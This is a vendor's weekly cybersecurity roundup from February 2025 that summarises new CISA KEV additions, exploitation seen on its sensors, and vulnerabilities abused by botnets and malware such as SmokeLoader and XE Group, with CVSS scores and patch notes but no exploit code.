Home
/
Weekly Reports

Weekly Cybersecurity Roundup: CISA KEV Additions & Emerging Threats

February 7, 2025
Executive Summary
Trending / Critical Vulnerabilities
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Vulnerabilities abused by Botnet
Vulnerabilities Abused by Malware
PRE-NVD observed for this week
External References
Subscribe to our Reports

Executive Summary

A chaotic kickoff to February in cybersecurity, with the CISA KEV catalog expanding by 10 vulnerabilities, underscoring the ongoing challenge of addressing both emerging and long-standing vulnerabilities. Among them, two impact Microsoft products, while legacy yet unpatched flaws remain prime targets, including two seven-year-old vulnerabilities in Paessler PRTG Network Monitor and two five-year-old flaws in Sophos products.  

Meanwhile, botnets remain an active threat, as EnemyBot and Sysrv-K exploit weaknesses in Spring Cloud Gateway, while Mozi, Andr0xgh0st, Tsunami, Spytech Necro, and Sysrv focus their attacks on Atlassian products.

Cybercriminal groups are intensifying their tactics, with Russian actors exploiting a zero-day in 7-Zip to distribute SmokeLoader, while XE Group targets zero-day vulnerabilities in VeraCore to establish persistence and execute arbitrary commands.

With threat actors relentlessly adapting, unpatched vulnerabilities remain prime targets, making swift mitigation and proactive defence more critical than ever.

Trending / Critical Vulnerabilities

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2025-0411

A Mark-of-the-Web Bypass Vulnerability in 7-Zip, affecting versions prior to 24.09, enables remote attackers to execute arbitrary code with the privileges of the current user.  This high-severity zero-day vulnerability, with a CVSS score of 7.0, has an available proof-of-concept (PoC) and was recently included in the CISA's Known Exploited Vulnerabilities (KEV) catalog.  

CVE-2025-0890

A Default Credentials Vulnerability in Zyxel CPE devices, rated critical with a CVSS score of 9.8, poses a severe security risk. Zyxel has confirmed that the affected products have reached End-of-Life and will no longer receive updates or support. According to VulnCheck, this vulnerability is being actively exploited alongside CVE-2024-40891, enabling unauthenticated code execution via Telnet.

CVE-2024-21413

An Improper Input Validation Vulnerability in Microsoft Outlook, rated critical with a CVSS score of 9.8, allows attackers to bypass Office Protected View, forcing documents to open in editing mode instead of protected mode. With proof-of-concept (PoC) available, the risk of exploitation remains high. This vulnerability was recently added to the CISA KEV catalog.

CVE-2024-29059

An Information Disclosure Vulnerability in the Microsoft .Net Framework poses a significant risk by exposing sensitive data. Proof-of-concept is already available, highlighting the potential for exploitation. Microsoft has released a security update in March 2024 to address this issue, ensuring protection for users. This high-severity vulnerability has recently been added to the CISA KEV catalog, underscoring the importance of timely patching.

CVE-2024-45195

A Forced Browsing Vulnerability in the Apache OFBiz, allows remote attackers to gain unauthorized access. According to Rapid7, this flaw serves as a bypass for previously patched vulnerabilities - CVE-2024-32113, CVE-2024-36104, CVE-2024-38856, all originating from the same underlying weakness. The Apache OFBiz team has addressed this issue in version 18.12.16, and due to its active exploitation, it has been included in the CISA KEV catalog.  

CVE-2024-53104

An Out-of-Bounds Write Vulnerability in the UVCVideo Driver of the Linux Kernel has been identified, potentially leading to memory corruption. Google has acknowledged "limited, targeted exploitation" of the flaw but has not provided specific details regarding the exploitation. This zero-day vulnerability, addressed in the February Android update, has been added to the CISA KEV catalog due to its critical severity.

CVE-2022-23748

A Process Control Vulnerability in Dante Discovery, rated high with a CVSS score of 7.8, allows for a DLL sideloading attack through mDNSResponder.exe, enabling local attackers to execute arbitrary code via the Dante Application Library. Third-party products using Dante Application Library for Windows v1.2.0 and earlier are affected. To mitigate this, an updated mDNSResponder.exe v1.3.2 has been released as part of Dante Application Library for Windows v1.2.1 and as a standalone security patch for earlier versions. Recently added to the CISA KEV catalog, this vulnerability remains a significant security concern.

CVE-2020-15069

A Buffer Overflow Vulnerability in Sophos XG Firewall, identified five years ago, allows remote code execution through the "HTTP/S bookmark" feature. Rated critical with a CVSS score of 9.8, this flaw poses a severe security risk, especially with a proof-of-concept (PoC) available. A hotfix (HF062020.1) was released for all firewalls running v17.x to address the issue. This vulnerability was recently added to the CISA KEV catalog.

CVE-2020-29574

An SQL Injection Vulnerability in the WebAdmin interface of Sophos CyberoamOS (CROS) allows unauthenticated attackers to execute arbitrary SQL statements remotely.   This critical flaw, with a CVSS score of 9.8, has persisted for over five years in End-of-Life (EOL) products that no longer receive security updates or support. This flaw was recently added to the CISA KEV catalog.

CVE-2018-9276  

An OS Command Injection Vulnerability has been identified in Paessler PRTG Network Monitor, impacting versions prior to 18.2.39. This high-severity vulnerability arises from malformed parameter injections during sensor or notification management and can enable an attacker with administrative access to the PRTG System Administrator web console to execute arbitrary commands on the server. With its addition to the CISA KEV catalog, timely system updates are essential to avoid exploitation.

CVE-2018-19410

A Local File Inclusion Vulnerability in the Paessler PRTG Network Monitor affecting versions prior to 18.2.40.1683. This critical flaw, with a CVSS Score of 9.8, could allow attackers to access sensitive files on the system. Paessler addressed this issue in April 2018 with the release of PRTG version 18.2.41.1652. This vulnerability was recently added to the CISA KEV catalog.

Exploit Activity and Mass Scanning Observed on Cytellite Sensors

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

CVE Product Severity Title Exploited – in the wild CISA KEV
CVE-2024-8503 VICIdial Critical SQL injection Vulnerability in VICIdial 2.14-917a leads to sensitive information disclosure False False
CVE-2024-47176 CUPS Medium Improper Input Validation Vulnerability in OpenPrinting CUPS browsed through 2.0.1 leads to remote code execution True False
CVE-2024-38856 Apache OFBiz High Incorrect Authorization Vulnerability in Apache OFBiz before 18.12.15 leads to remote code execution True True
CVE-2024-3400 Palo Alto Networks PAN-OS Critical Command Injection Vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS True True
CVE-2024-29973 Zyxel Devices Critical Command Injection Vulnerability in “setCookie” parameter in Zyxel NAS326 and NAS542 devices True False
CVE-2024-27564 pictureproxy.php File Medium Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the url parameter False False
CVE-2024-1709 ConnectWise ScreenConnect Critical Authentication Bypass Using an Alternate Path or Channel Vulnerability in ConnectWise ScreenConnect through 23.9.7 leads to sensitive information disclosure True True
CVE-2023-23752 Joomla Medium Improper Access Control Vulnerability in Joomla! True True
CVE-2023-26801 LB-LINK Critical Command Injection Vulnerability in LB-LINK devices. True False
CVE-2023-38646 Metabase open source and Enterprise Critical Remote Code Execution Vulnerability in Metabase open source and Metabase Enterprise True False
CVE-2022-41040 Microsoft Exchange Server High Server-Side Request Forgery Vulnerability in Microsoft Exchange Server True True
CVE-2022-47945 ThinkPHP Framework Critical Path Traversal Vulnerability in ThinkPHP Framework leads to arbitrary code execution False False

Vulnerabilities abused by Botnet

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

Vulnerability Product Title Exploit Abused by Botnet
CVE-2022-22947 Spring Cloud Gateway Remote Code Execution Vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ True EnemyBot
Sysrv-K
CVE-2021-26086 Atlassian Jira Server and Data Center Path Traversal Vulnerability in Atlassian Jira Server and Data Center leads to read of data files in the /WEB-INF/web.xml endpoint True MOZI
Androxgh0st
CVE-2021-26084 Atlassian Confluence Server and Data Center OGNL Injection Vulnerability in Confluence Server and Data Center leads to arbitrary code execution True Tsunami
N3Cr0m0rPh
Sysrv

Vulnerabilities Abused by Malware

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.  

CVE-2025-0411

The Trend ZDI Threat Hunting team discovered this zero-day vulnerability in the 7-Zip archiver tool, being actively exploited in-the-wild to deploy the SmokeLoader malware. Russian cybercrime groups are leveraging this flaw to target governmental and non-governmental organizations in Ukraine, likely for cyberespionage amid the ongoing Russo-Ukrainian conflict. The attack chain involves homoglyph techniques and compromised email accounts, enabling threat actors to evade detection and execute their operations effectively.

CVE-2025-25181 and CVE-2024-57968

Cybersecurity researchers from Intezer and Solis Security have uncovered a significant shift in tactics by XE Group, a cybercriminal organization active since at least 2013. Previously known for credit card skimming and supply chain attacks, the group has evolved into a more sophisticated threat actor, now exploiting zero-day vulnerabilities to infiltrate organizations. In 2024, XE Group leveraged two such flaws in VeraCore software: CVE-2025-25181 and CVE-2024-57968, to deploy webshells, maintain unauthorized access, and execute arbitrary commands on compromised systems.

Vulnerability Severity Title Patch Targeted By Malware OSS
CVE-2025-0411 High Mark-of-the-Web Bypass Vulnerability in 7-Zip Yes SmokeLoader False
CVE-2025-25181 Medium SQL Injection Vulnerability in Advantive VeraCore No XE Group False
CVE-2024-57968 Critical Upload Validation Vulnerability in Advantive VeraCore No XE Group False

PRE-NVD observed for this week

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

CVE-ID Type of Vulnerability Product Reference
CVE-2025-0899 Use-After-Free PDF-XChange Editor Resource
CVE-2025-1044 Authentication Bypass Logsign Unified SecOps Platform Resource
CVE-2025-1052 Heap Based Buffer Overflow Mintty Resource
CVE-2025-24387 Cross-site request forgery OTRS Application Server Resource
CVE-2024-9523 Local Privilege Escalation Avira Prime Resource

External References

  1. https://www.cisa.gov/news-events/alerts/2025/02/05/cisa-adds-one-known-exploited-vulnerability-catalog
  2. https://www.cisa.gov/news-events/alerts/2025/02/06/cisa-adds-five-known-exploited-vulnerabilities-catalog
  3. https://www.cisa.gov/news-events/alerts/2025/02/04/cisa-adds-four-known-exploited-vulnerabilities-catalog
  4. https://intezer.com/blog/research/xe-group-exploiting-zero-days/  
  5. https://www.trendmicro.com/en_us/research/25/a/cve-2025-0411-ukrainian-organizations-targeted.html  
  6. https://vulncheck.com/blog/zyxel-telnet-vulns  
  7. https://source.android.com/docs/security/bulletin/2025-02-01

Get notified

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Latest Reports

Latest Reports

View all our reports →
Zero-Days, Active Exploits, and Botnets: Key Cybersecurity risks of the week
January 31, 2025
A Week of Botnet Campaigns and Exploit Spikes
January 24, 2025
Cybersecurity Solutions
Vulnerability IntelligenceSecurity & Threat Intelligence IntegrationsVulnerability & Configuration ManagementOSS - Software Composition AnalysisOSS - Dependancy DefenceOSS - Zero-Day DiscoveryThreat IntelligenceExternal Attack Surface DiscoveryCloud Security Posture ManagementCloud Workload Protection
IT Solutions
Data Science & AISoftware Development  & SupportQA AutomationStaff Augmentation
Platforms
LOVICytellite
Company
BlogsReportsAbout usCareers
Research
Research-as-a -ServiceZero-Day Discovery
1-703-956-7410info@loginsoft.com
© 2024 - Copyright
Privacy policy